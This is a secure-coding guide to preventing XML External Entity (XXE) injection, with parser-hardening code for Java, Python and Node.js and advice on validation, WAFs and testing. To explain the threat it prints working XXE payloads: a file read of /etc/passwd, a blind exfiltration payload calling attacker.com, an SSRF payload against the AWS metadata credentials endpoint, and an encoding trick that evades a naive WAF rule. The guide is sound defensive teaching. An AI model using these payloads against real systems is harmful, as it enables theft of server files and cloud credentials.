XXE Injection Prevention: Stopping XML External Entity Attacks

XML External Entity (XXE) injection is a critical server-side vulnerability that exploits weakly configured XML parsers. When an application parses XML input without disabling external entity processing, an attacker can use specially crafted XML to read arbitrary files from the server, trigger server-side request forgery (SSRF), or in some cases achieve remote code execution. Despite being well-understood, XXE continues to appear in enterprise applications, APIs, and document processing pipelines.

How XXE Works

XML supports a feature called external entities — references to resources outside the document itself. A standard XML document with an external entity looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When the XML parser processes this document and external entity resolution is enabled, it replaces &xxe; with the contents of /etc/passwd. The application then reflects or stores that content, and the attacker has successfully read a sensitive file.
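The substitution step itself can be observed safely with an internal entity, which the parser expands in the same way but without touching any external resource. The following is a minimal sketch using Python's standard library; the entity name greeting and its replacement text are made up for illustration.

```python
import xml.etree.ElementTree as ET

# An internal entity: the replacement text lives inside the document itself,
# so expanding it never touches the filesystem or the network.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY greeting "hello from the DTD">
]>
<root>
  <data>&greeting;</data>
</root>"""

root = ET.fromstring(DOCUMENT)
expanded = root.find("data").text
print(expanded)  # hello from the DTD
```

An external entity follows the same mechanism, except that the replacement text is fetched from the SYSTEM URI, which is what makes it dangerous.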

The attack surface is wider than most developers realize. Any endpoint that accepts XML — SOAP APIs, file upload features (docx, xlsx, svg), RSS/Atom parsers, and configuration imports — is potentially vulnerable.
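Office formats are a good example of XML hiding behind another file type: a .docx or .xlsx upload is a ZIP archive whose members are mostly XML. The sketch below builds a tiny stand-in archive in memory (the member names mirror a typical .docx layout, but the contents are placeholders) and lists the parts an XML parser would end up processing. list_xml_parts is a hypothetical helper, not part of any library.

```python
import io
import zipfile

def list_xml_parts(archive_bytes: bytes) -> list[str]:
    """Return the names of archive members that an XML parser would see."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        return sorted(
            name for name in archive.namelist()
            if name.endswith((".xml", ".rels"))
        )

# Build a placeholder archive that mimics the layout of a .docx file.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("[Content_Types].xml", "<Types/>")
    archive.writestr("_rels/.rels", "<Relationships/>")
    archive.writestr("word/document.xml", "<document/>")
    archive.writestr("word/media/image1.png", b"\x89PNG")

xml_parts = list_xml_parts(buffer.getvalue())
print(xml_parts)
```

Every name in that list is a separate XML document, and each one is parsed by whatever library the upload handler uses.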

File Read via XXE

The most common XXE payload targets the local filesystem. Typical targets include:

/etc/passwd — list of system users
/etc/shadow — hashed passwords (if readable)
~/.ssh/id_rsa — private SSH keys
Application source code and configuration files containing database credentials

On Windows systems, attackers swap Unix paths for Windows equivalents like C:\Windows\win.ini or C:\inetpub\wwwroot\web.config.

A more subtle variation called blind XXE uses out-of-band channels to exfiltrate data when the application does not directly reflect parsed content:

<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/exfil.dtd">
  %dtd;
]>

The external DTD on the attacker's server then chains parameter entities to send the file contents as an HTTP query string to a server the attacker controls.

SSRF via XXE

XXE is not limited to the local filesystem. By changing the SYSTEM URI to an http:// URL, attackers can force the XML parser to make HTTP requests on behalf of the server:

<!DOCTYPE foo [
  <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&ssrf;</data></root>

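This payload targets the AWS EC2 Instance Metadata Service (IMDS). The path shown returns the name of the IAM role attached to the instance; a second request with that name appended returns temporary credentials that grant access to AWS APIs. The attack works against IMDSv1, whereas IMDSv2 requires a session token obtained with a PUT request, which an XML parser will not issue. In internal networks, the same technique allows attackers to scan internal ports, hit internal APIs, and pivot to services that are not exposed publicly.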

Disabling External Entities in Java

Java's standard XML APIs are vulnerable by default. The fix is to explicitly disable external entity processing and DTD loading on every parser you instantiate.

For DocumentBuilderFactory:

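import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Reject any document that contains a DOCTYPE declaration.
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth: also disable external entities and external DTD loading.
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
// Disable XInclude processing and entity reference expansion.
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
DocumentBuilder builder = factory.newDocumentBuilder();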

For SAXParserFactory:

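import javax.xml.parsers.SAXParserFactory;

SAXParserFactory spf = SAXParserFactory.newInstance();
// Reject DOCTYPE declarations, then disable external entities and external DTD loading.
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);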

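The safest single setting is disallow-doctype-decl. If your application never needs to process DOCTYPE declarations, this one flag makes the parser reject any document that contains one, which blocks DTD-based XXE outright because an entity cannot be declared without a DOCTYPE.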

Disabling External Entities in Python

Python's xml.etree.ElementTree does not expand external entities: in Python 3.8+ it raises a ParseError when it encounters an external entity reference. However, lxml and older libraries require explicit configuration.
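The standard library's behavior is easy to confirm. The sketch below feeds the file-read payload from earlier to xml.etree.ElementTree and reports whether the parser accepted it; parse_or_reject is a hypothetical helper written for this illustration.

```python
import xml.etree.ElementTree as ET

PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>"""

def parse_or_reject(xml_text: str) -> str:
    """Return 'parsed' on success, or 'rejected' if the parser raises ParseError."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError as exc:
        print(f"rejected: {exc}")
        return "rejected"
    return "parsed"

outcome = parse_or_reject(PAYLOAD)
```

The external entity is never resolved, so the file is never read. Ordinary documents without entity references are unaffected.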

Using defusedxml (recommended):

import defusedxml.ElementTree as ET

tree = ET.parse("input.xml")
root = tree.getroot()

defusedxml is a drop-in replacement for the standard library's XML modules. It disables all entity expansion, DTD loading, and external resource fetching by raising exceptions on any dangerous construct.

Hardening lxml directly:

from lxml import etree

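parser = etree.XMLParser(
    resolve_entities=False,  # do not substitute entity references
    no_network=True,         # block network access while resolving resources
    load_dtd=False           # do not load or parse DTDs
)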
tree = etree.parse("input.xml", parser)

When processing untrusted input with lxml, never call etree.fromstring() or etree.parse() without passing a hardened parser as the second argument, for example etree.fromstring(data, parser).

Disabling External Entities in Node.js

Node.js applications that process XML typically rely on packages like xml2js, fast-xml-parser, or libxmljs2.

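xml2js is built on the sax package, which does not resolve external entities, so it is safe from classic XXE by default for most use cases. It still parses <!DOCTYPE> declarations, though. The options below only control how the parsed output is shaped; they are not XXE controls, so reject DOCTYPE-bearing input upstream if your application never needs it: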

const xml2js = require('xml2js');

const parser = new xml2js.Parser({
  explicitArray: false,
  xmlns: false,
});

fast-xml-parser is safe by default and does not resolve external entities. Always verify the version you're using and pin dependencies.

libxmljs2 requires explicit configuration:

const libxml = require('libxmljs2');

const doc = libxml.parseXml(xmlString, {
  noent: false,   // disable entity substitution
  dtdload: false, // do not load external DTDs
  nonet: true,    // block network access during parsing
});

Additional Defenses

Input validation and schema enforcement

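If your application only needs to accept a specific XML structure, validate incoming documents against a strict XML Schema (XSD) and reject any document that does not match. Validation is itself a parsing step, so run it with a parser that already has external entities and DTD loading disabled; a schema check alone does not stop XXE, because the DOCTYPE is processed before the document is compared with the schema.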
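As a rough illustration of structure enforcement, the sketch below uses a hand-rolled allowlist check with the standard library rather than a real XSD validator. The document type (order) and the field names are hypothetical, and a production system would more likely validate against an actual schema.

```python
import xml.etree.ElementTree as ET

EXPECTED_ROOT = "order"                      # hypothetical document type
ALLOWED_FIELDS = {"id", "item", "quantity"}  # hypothetical leaf elements

def has_expected_shape(xml_text: str) -> bool:
    """Accept only <order> documents whose children are known, non-nested fields."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        # Malformed input, or an entity the parser refused to expand.
        return False
    if root.tag != EXPECTED_ROOT:
        return False
    return all(child.tag in ALLOWED_FIELDS and len(child) == 0 for child in root)

print(has_expected_shape("<order><id>7</id><item>pen</item></order>"))     # True
print(has_expected_shape("<order><id>7</id><admin>true</admin></order>"))  # False
```

The check runs on the output of a parser that already refuses external entities, which is the ordering that matters: structure enforcement narrows what the application accepts, but the parser configuration is what stops XXE.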

Replace XML with JSON

For new APIs and data exchange formats, prefer JSON. JSON has no concept of external entities or DTDs, eliminating this entire attack class. SOAP and legacy enterprise integrations are the main places where XML is unavoidable.

WAF rules

Web Application Firewalls can detect and block common XXE payloads by matching patterns like SYSTEM, ENTITY, and DOCTYPE in request bodies. WAF rules are a useful defense-in-depth layer but should not be the primary control — a determined attacker can encode or obfuscate payloads to bypass pattern matching.
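The weakness of pattern matching is easy to reproduce. The sketch below implements a deliberately naive byte-level signature (an illustration, not how any particular WAF product works) and shows that re-encoding the same document as UTF-16 slips past it, even though an XML parser would still decode and process the payload.

```python
import re

# Naive signature: the kind of byte pattern a simple rule might match on.
DTD_SIGNATURE = re.compile(rb"<!(DOCTYPE|ENTITY)", re.IGNORECASE)

def looks_like_xxe(body: bytes) -> bool:
    """Return True if the raw body contains a DOCTYPE or ENTITY declaration."""
    return DTD_SIGNATURE.search(body) is not None

payload = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<root>&xxe;</root>"
)

utf8_body = payload.encode("utf-8")
utf16_body = payload.encode("utf-16")  # same document, different byte encoding

print(looks_like_xxe(utf8_body))   # True
print(looks_like_xxe(utf16_body))  # False
```

In UTF-16 every ASCII character is followed or preceded by a zero byte, so the literal byte sequence <!DOCTYPE never appears in the request body.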

Least-privilege for the application process

Even if an attacker successfully exploits XXE, a process running as a low-privilege user with restricted filesystem access limits how much damage can be done. Run application servers as dedicated users with no read access to sensitive system files or credential stores.

Testing for XXE

Include XXE testing in every security review of XML-processing code. The OWASP Testing Guide and tools like Burp Suite's active scanner include XXE detection. For CI/CD pipelines, static analysis tools (Semgrep, Checkmarx) can flag XML parser instantiation without security features enabled.
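A regression test can complement scanners by exercising the real parsing path. The sketch below writes a canary file, references it through an external entity, and checks whether the canary value shows up in the parsed output. parse_document is a hypothetical stand-in for the application's XML entry point, and the canary value is arbitrary.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

def parse_document(xml_bytes: bytes) -> str:
    """Hypothetical stand-in for the application's XML entry point."""
    root = ET.fromstring(xml_bytes)
    return "".join(root.itertext())

def xxe_canary_leaks(parse) -> bool:
    """Return True if `parse` expands an external entity pointing at a canary file."""
    secret = "xxe-canary-7f3a"
    with tempfile.TemporaryDirectory() as tmp:
        canary = Path(tmp) / "canary.txt"
        canary.write_text(secret)
        payload = (
            '<?xml version="1.0"?>'
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{canary.as_uri()}">]>'
            "<root><data>&xxe;</data></root>"
        ).encode("utf-8")
        try:
            return secret in parse(payload)
        except Exception:
            # A parser that rejects the document outright did not leak anything.
            return False

leaked = xxe_canary_leaks(parse_document)
print(leaked)  # False
```

Pointing xxe_canary_leaks at each XML entry point in the codebase turns a parser misconfiguration into a failing test rather than a finding in the next penetration test.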

The single most effective fix is to disable external entity processing at the parser level. Apply it universally across your codebase, not just on endpoints you currently believe to be vulnerable.